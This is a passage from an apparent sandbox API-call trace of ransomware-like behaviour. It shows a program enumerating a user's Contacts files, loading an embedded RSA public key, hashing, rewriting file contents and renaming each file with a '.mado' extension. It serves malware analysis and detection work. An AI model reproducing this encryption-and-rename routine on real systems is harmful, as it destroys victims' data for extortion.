hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b808a8 | out: hHeap=0x2c0000) returned 1 [0203.638] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b69d8 | out: hHeap=0x2c0000) returned 1 [0203.638] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b790 | out: hHeap=0x2c0000) returned 1 [0203.638] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fdcf8 | out: hHeap=0x2c0000) returned 1 [0203.638] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7b0 | out: hHeap=0x2c0000) returned 1 [0203.638] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fdd28 | out: hHeap=0x2c0000) returned 1 [0203.638] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36e0 | out: hHeap=0x2c0000) returned 1 [0203.638] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fdce0 | out: hHeap=0x2c0000) returned 1 [0203.638] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fdc68 | out: hHeap=0x2c0000) returned 1 [0203.638] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0203.638] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0218 | out: hHeap=0x2c0000) returned 1 [0203.639] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b66498 | out: hHeap=0x2c0000) returned 1 [0203.639] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fdcb0 | out: hHeap=0x2c0000) returned 1 [0203.639] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x305cd0 | out: hHeap=0x2c0000) returned 1 [0203.639] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c6a8 | out: hHeap=0x2c0000) returned 1 [0203.639] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b66288 | out: hHeap=0x2c0000) returned 1 [0203.639] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3a48 | out: hHeap=0x2c0000) returned 1 [0203.639] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67078 | out: hHeap=0x2c0000) returned 1 [0203.639] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b3720 | out: hHeap=0x2c0000) returned 1 [0203.639] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0203.639] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36c0 | out: hHeap=0x2c0000) returned 1 [0203.639] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e51f8 | out: hHeap=0x2c0000) returned 1 [0203.639] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32eb20 | out: hHeap=0x2c0000) returned 1 [0203.639] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0203.639] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310cb0 | out: hHeap=0x2c0000) returned 1 [0203.639] WriteFile (in: hFile=0x63c, lpBuffer=0x3310808*, nNumberOfBytesToWrite=0x494, lpNumberOfBytesWritten=0x39cfb14, lpOverlapped=0x0 | out: lpBuffer=0x3310808*, lpNumberOfBytesWritten=0x39cfb14*=0x494, lpOverlapped=0x0) returned 1 [0203.639] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0203.639] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x499, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0203.639] WriteFile (in: hFile=0x63c, lpBuffer=0x3b66078*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b66078*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0203.639] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b66078 | out: hHeap=0x2c0000) returned 1 [0203.639] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0203.639] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x3310808 [0203.639] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", cchWideChar=-1, lpMultiByteStr=0x3310808, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", lpUsedDefaultChar=0x0) returned 41 [0203.639] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x3b80690 [0203.639] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0203.639] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0203.640] WriteFile (in: hFile=0x63c, lpBuffer=0x3b80690*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b80690*, lpNumberOfBytesWritten=0x39cfb50*=0x28, lpOverlapped=0x0) returned 1 [0203.640] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b80690 | out: hHeap=0x2c0000) returned 1 [0203.640] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0203.640] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0203.640] CloseHandle (hObject=0x63c) returned 1 [0203.640] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321c00 [0203.640] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x890) returned 0x3b80690 [0203.641] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321c00 | out: hHeap=0x2c0000) returned 1 [0203.641] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\chucu jadnvk.contact"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\chucu jadnvk.contact.mado")) returned 1 [0203.641] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b80690 | out: hHeap=0x2c0000) returned 1 [0203.641] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0203.641] VirtualFree (lpAddress=0x3d10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.642] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3219e0 | out: hHeap=0x2c0000) returned 1 [0203.642] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x19c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0203.642] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c3a48 [0203.642] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x76) returned 0x326020 [0203.642] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3a48 | out: hHeap=0x2c0000) returned 1 [0203.642] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\desktop.ini") returned=".ini" [0203.642] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326020 | out: hHeap=0x2c0000) returned 1 [0203.642] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x496, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="lulcit amkdfe.contact", cAlternateFileName="LULCIT~1.CON")) returned 1 [0203.642] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c3a48 [0203.642] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x3219e0 [0203.643] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3a48 | out: hHeap=0x2c0000) returned 1 [0203.643] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact") returned=".contact" [0203.643] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\lulcit amkdfe.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0203.643] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=1174) returned 1 [0203.644] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0203.646] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x470, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0203.646] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0203.647] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0203.647] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0203.647] SetFilePointer (in: hFile=0x63c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0203.647] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x496, lpOverlapped=0x0) returned 1 [0203.648] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0203.648] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x32eb20 [0203.648] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0203.648] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0203.648] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321c00) returned 1 [0203.648] CryptCreateHash (in: hProv=0x321c00, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0203.649] CryptHashData (hHash=0x32ef238, pbData=0x32eb20, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0203.649] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0203.649] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0203.649] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0203.649] GetLastError () returned 0x0 [0203.649] SetLastError (dwErrCode=0x0) [0203.649] GetLastError () returned 0x0 [0203.649] SetLastError (dwErrCode=0x0) [0203.649] GetLastError () returned 0x0 [0203.649] SetLastError (dwErrCode=0x0) [0203.649] GetLastError () returned 0x0 [0203.649] SetLastError (dwErrCode=0x0) [0203.649] GetLastError () returned 0x0 [0203.649] SetLastError (dwErrCode=0x0) [0203.649] GetLastError () returned 0x0 [0203.649] SetLastError (dwErrCode=0x0) [0203.649] GetLastError () returned 0x0 [0203.649] SetLastError (dwErrCode=0x0) [0203.649] GetLastError () returned 0x0 [0203.649] SetLastError (dwErrCode=0x0) [0203.649] GetLastError () returned 0x0 [0203.649] SetLastError (dwErrCode=0x0) [0203.649] GetLastError () returned 0x0 [0203.649] SetLastError (dwErrCode=0x0) [0203.649] GetLastError () returned 0x0 [0203.649] SetLastError (dwErrCode=0x0) [0203.649] GetLastError () returned 0x0 [0203.649] SetLastError (dwErrCode=0x0) [0203.649] GetLastError () returned 0x0 [0203.649] SetLastError (dwErrCode=0x0) [0203.650] GetLastError () returned 0x0 [0203.650] SetLastError (dwErrCode=0x0) [0203.650] GetLastError () returned 0x0 [0203.650] SetLastError (dwErrCode=0x0) [0203.650] GetLastError () returned 0x0 [0203.650] SetLastError (dwErrCode=0x0) [0203.650] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0203.650] GetLastError () returned 0x0 [0203.650] SetLastError (dwErrCode=0x0) [0203.650] GetLastError () returned 0x0 [0203.650] SetLastError (dwErrCode=0x0) [0203.650] GetLastError () returned 0x0 [0203.650] SetLastError (dwErrCode=0x0) [0203.650] GetLastError () returned 0x0 [0203.650] SetLastError (dwErrCode=0x0) [0203.650] GetLastError () returned 0x0 [0203.650] SetLastError (dwErrCode=0x0) [0203.650] GetLastError () returned 0x0 [0203.650] SetLastError (dwErrCode=0x0) [0203.650] GetLastError () returned 0x0 [0203.650] SetLastError (dwErrCode=0x0) [0203.650] GetLastError () returned 0x0 [0203.650] SetLastError (dwErrCode=0x0) [0203.650] GetLastError () returned 0x0 [0203.650] SetLastError (dwErrCode=0x0) [0203.650] GetLastError () returned 0x0 [0203.650] SetLastError (dwErrCode=0x0) [0203.650] GetLastError () returned 0x0 [0203.650] SetLastError (dwErrCode=0x0) [0203.650] GetLastError () returned 0x0 [0203.650] SetLastError (dwErrCode=0x0) [0203.650] GetLastError () returned 0x0 [0203.651] SetLastError (dwErrCode=0x0) [0203.651] GetLastError () returned 0x0 [0203.651] SetLastError (dwErrCode=0x0) [0203.651] GetLastError () returned 0x0 [0203.651] SetLastError (dwErrCode=0x0) [0203.651] GetLastError () returned 0x0 [0203.651] SetLastError (dwErrCode=0x0) [0203.651] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0203.651] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0203.651] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b3720 | out: hHeap=0x2c0000) returned 1 [0203.651] CryptDestroyHash (hHash=0x32ef238) returned 1 [0203.651] CryptReleaseContext (hProv=0x321c00, dwFlags=0x0) returned 1 [0203.651] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32eb20 | out: hHeap=0x2c0000) returned 1 [0203.651] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0203.651] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0203.651] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0203.651] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0203.651] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0203.651] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0203.651] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4a0) returned 0x3310808 [0203.651] SetFilePointer (in: hFile=0x63c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0203.651] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0203.651] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x3310cb0 [0203.651] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0203.651] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x32eb20 [0203.651] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e51f8 [0203.651] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x305cd0 [0203.651] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fdcb0 [0203.651] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b6db80 [0203.651] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fdc68 [0203.652] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fdce0 [0203.652] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fdd28 [0203.652] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fdcf8 [0203.652] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x32f7e58 [0203.652] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x3294350 [0203.652] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3294350, Size=0x218) returned 0x3b80690 [0203.652] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b808b0 [0203.652] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fdce0 | out: hHeap=0x2c0000) returned 1 [0203.652] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fdcf8 | out: hHeap=0x2c0000) returned 1 [0203.652] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fdd28 | out: hHeap=0x2c0000) returned 1 [0203.652] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f7e58 | out: hHeap=0x2c0000) returned 1 [0203.652] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b808b0 | out: hHeap=0x2c0000) returned 1 [0203.652] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fdd28 [0203.652] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277198 [0203.652] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x32fdcf8 [0203.652] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b36c0 [0203.652] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x32fdce0 [0203.652] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277188 [0203.652] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x32b69d8 [0203.652] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0203.652] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e5258 [0203.652] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b3720 [0203.652] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x3b67078 [0203.652] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36e0 [0203.652] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0203.652] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b69d8 | out: hHeap=0x2c0000) returned 1 [0203.652] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fdcf8 | out: hHeap=0x2c0000) returned 1 [0203.652] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0203.652] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fdce0 | out: hHeap=0x2c0000) returned 1 [0203.652] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36c0 | out: hHeap=0x2c0000) returned 1 [0203.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0203.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fdd28 | out: hHeap=0x2c0000) returned 1 [0203.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0203.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e51f8 | out: hHeap=0x2c0000) returned 1 [0203.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b80690 | out: hHeap=0x2c0000) returned 1 [0203.653] GetCurrentThreadId () returned 0x600 [0203.653] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b66078 [0203.653] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x3234c0 [0203.653] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x32c0218 [0203.653] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321c00 [0203.653] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x336fe98 [0203.653] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0203.653] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277188 [0203.653] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b66288 [0203.653] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.653] GetCurrentThreadId () returned 0x600 [0203.653] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.653] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x32b69d8 [0203.653] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.653] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b69d8 | out: hHeap=0x2c0000) returned 1 [0203.653] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b66498 [0203.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0203.653] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x32c3a48 [0203.653] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0203.653] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b66180 [0203.653] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0203.654] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fdd28 [0203.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0203.654] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0203.654] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x496, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0203.654] WriteFile (in: hFile=0x63c, lpBuffer=0x3b66078*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b66078*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0203.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b66078 | out: hHeap=0x2c0000) returned 1 [0203.654] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0203.654] WriteFile (in: hFile=0x63c, 